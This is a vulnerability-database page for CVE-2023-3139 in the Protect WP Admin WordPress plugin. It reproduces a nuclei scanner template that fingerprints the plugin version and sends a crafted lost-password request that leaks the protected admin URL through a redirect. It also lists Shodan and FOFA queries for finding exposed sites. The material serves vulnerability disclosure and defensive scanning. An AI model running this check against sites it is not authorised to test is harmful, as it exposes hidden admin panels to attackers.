Lucene search
K

Protect WP Admin < 4.0 - Unauthenticated Protection Bypass

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Protect WP Admin plugin before 4.0 leaks admin panel URL via redirect, bypassing protection.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-3139
16 Sep 202521:02
circl
CNNVD
WordPress plugin Protect WP Admin 输入验证错误漏洞
4 Jul 202300:00
cnnvd
CVE
CVE-2023-3139
4 Jul 202307:23
cve
Cvelist
CVE-2023-3139 Protect WP Admin < 4.0 - Unauthenticated Protection Bypass
4 Jul 202307:23
cvelist
EUVD
EUVD-2023-43824
3 Oct 202520:07
euvd
NVD
CVE-2023-3139
4 Jul 202308:15
nvd
OSV
CVE-2023-3139
4 Jul 202308:15
osv
Patchstack
WordPress Protect WP Admin Plugin < 4.0 is vulnerable to Bypass Vulnerability
22 Jun 202300:00
patchstack
Prion
Design/Logic Flaw
4 Jul 202308:15
prion
Positive Technologies
PT-2023-23296
4 Jul 202300:00
ptsecurity
Rows per page
id: CVE-2023-3139

info:
  name: Protect WP Admin < 4.0 - Unauthenticated Protection Bypass
  author: popcorn94
  severity: medium
  description: |
    The Protect WP Admin WordPress plugin before version 4.0 disclosed the URL of the admin panel through the redirection of a crafted URL, bypassing the protection offered.
  impact: |
    Unauthenticated attackers can exploit URL redirection to discover the protected admin panel URL and bypass the protection mechanism offered by the plugin.
  remediation: Fixed in 4.0 or later
  reference:
    - https://wpscan.com/vulnerability/f8a29aee-19cd-4e62-b829-afc9107f69bd/
    - https://magos-securitas.com/txt/CVE-2023-3139.txt
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3139
    cwe-id: CWE-601
    epss-score: 0.00734
    epss-percentile: 0.49956
    cpe: cpe:2.3:a:wp-experts:protect_wp_admin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp-experts
    product: protect_wp_admin
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/protect-wp-admin"
    fofa-query: body="/wp-content/plugins/protect-wp-admin/"
    publicwww-query: "/wp-content/plugins/protect-wp-admin/"
  tags: cve,cve2023,wordpress,wp-plugin,protect-wp-admin,unauth,wpscan,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/protect-wp-admin/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, 'Protect WP Admin')"
          - compare_versions(version, '<= 4.0')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-login.php?action=lostpassword&error=invalidkey"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 301"
          - "contains(location, '?action=lostpassword&error=invalidkey')"
        condition: and

    extractors:
      - type: regex
        part: header
        group: 1
        name: redirect_url
        regex:
          - 'Location:([ a-z:/0-9.?=&]+)'
        internal: true

      - type: dsl
        dsl:
          - '"Protected URL:"+ redirect_url'
# digest: 490a0046304402205ba13e6286d2fd11889026b22341564eed8c01147d134d7a0bb35e708e64046202202ec043182453c610ecbf8a4f1f445a86834cb6fe88314a709b7e87cf66304856:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.00734
SSVC
19